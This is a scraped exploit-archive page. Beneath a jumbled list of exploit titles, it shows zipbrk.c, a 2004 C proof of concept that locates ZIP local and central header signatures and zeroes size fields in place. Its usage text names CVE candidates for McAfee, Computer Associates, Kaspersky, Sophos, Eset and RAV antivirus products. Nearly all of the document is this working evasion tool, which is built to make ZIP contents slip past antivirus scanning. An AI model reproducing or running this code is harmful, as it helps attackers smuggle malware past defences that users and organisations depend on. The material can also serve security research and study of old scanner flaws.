477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
121 lines
3 KiB
C
Executable file
121 lines
3 KiB
C
Executable file
/*
|
|
zipbrk.c - Proof-of-Concept for CAN-2004-0932 - CAN-2004-0937
|
|
Copyright (C) 2004 oc.192
|
|
|
|
This program is free software; you can redistribute it and/or modify it under the terms of the GNU
|
|
General Public License as published by the Free Software Foundation; either version 2 of the License,
|
|
or (at your option) any later version.
|
|
|
|
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
|
|
even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
|
GNU General Public License for more details.
|
|
|
|
You should have received a copy of the GNU General Public License along with this program; if not,
|
|
write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
|
|
|
|
oc.192 phreaker net
|
|
*/
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
|
|
unsigned short LOCAL_HEADER_OFFSET = 16;
|
|
unsigned short CENTRAL_HEADER_OFFSET = 18;
|
|
unsigned long DATA_REPLACE_VALUE = 0x00000000;
|
|
|
|
void show_usage()
|
|
{
|
|
printf("zipbrk - by oc.192 [oc.192@phreaker.net]\n");
|
|
printf("Attempts to utilize the vulnerabilities described in:\n");
|
|
printf("CAN-2004-0932 - McAfee\nCAN-2004-0933 - Computer Associates\n"
|
|
"CAN-2004-0934 - Kaspersky\nCAN-2004-0937 - Sophos\n"
|
|
"CAN-2004-0935 - Eset\nCAN-2004-0936 - RAV\n\n");
|
|
printf(" Usage: zipbrk <zip_file>\n");
|
|
}
|
|
|
|
void patch_file(FILE *hfile, unsigned long offset)
|
|
{
|
|
char *buffer = malloc(1);
|
|
|
|
memset(buffer, 0, 1);
|
|
fseek(hfile, offset, SEEK_SET);
|
|
fwrite(buffer, 1, 1, hfile);
|
|
fwrite(buffer, 1, 1, hfile);
|
|
fwrite(buffer, 1, 1, hfile);
|
|
fwrite(buffer, 1, 1, hfile);
|
|
free(buffer);
|
|
}
|
|
|
|
void scan_file(char *filename)
|
|
{
|
|
FILE *hfile;
|
|
unsigned char buffer;
|
|
unsigned long offset = 0;
|
|
|
|
if ((hfile = fopen(filename, "rb+")) == NULL)
|
|
{
|
|
printf("[-] Error: Unable to open %s", filename);
|
|
return;
|
|
}
|
|
printf("[+] Scanning %s ...\n", filename);
|
|
|
|
while (fread(&buffer, sizeof(buffer), 1, hfile))
|
|
{
|
|
if (buffer == 0x50)
|
|
{
|
|
fread(&buffer, sizeof(buffer), 1, hfile);
|
|
if (buffer == 0x4B)
|
|
{
|
|
fread(&buffer, sizeof(buffer), 1, hfile);
|
|
if (buffer == 0x01)
|
|
{
|
|
fread(&buffer, sizeof(buffer), 1, hfile);
|
|
if (buffer == 0x02)
|
|
{
|
|
/* perform write */
|
|
offset = ftell(hfile);
|
|
offset = offset + LOCAL_HEADER_OFFSET;
|
|
printf(" [-] Writing local header patch [0x%.8X]\n", offset);
|
|
patch_file(hfile, offset);
|
|
fseek(hfile, offset, SEEK_SET);
|
|
}
|
|
}
|
|
else if (buffer == 0x03)
|
|
{
|
|
fread(&buffer, sizeof(buffer), 1, hfile);
|
|
if (buffer == 0x04)
|
|
{
|
|
/* perform write */
|
|
offset = ftell(hfile);
|
|
offset = offset + CENTRAL_HEADER_OFFSET;
|
|
printf(" [-] Writing central header patch [0x%.8X]\n", offset);
|
|
patch_file(hfile, offset);
|
|
fseek(hfile, offset, SEEK_SET);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
printf("[+] File scanning finished. EOF:%d ERR:%d\n", feof(hfile), ferror(hfile));
|
|
fclose(hfile);
|
|
}
|
|
|
|
int main(int argc, char *argv[])
|
|
{
|
|
if (argc != 2)
|
|
{
|
|
show_usage();
|
|
return 0;
|
|
}
|
|
|
|
if (!strcmp(argv[1], "-h") || !strcmp(argv[1], "/?"))
|
|
{
|
|
show_usage();
|
|
return 0;
|
|
}
|
|
|
|
scan_file(argv[1]);
|
|
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2004-11-14]
|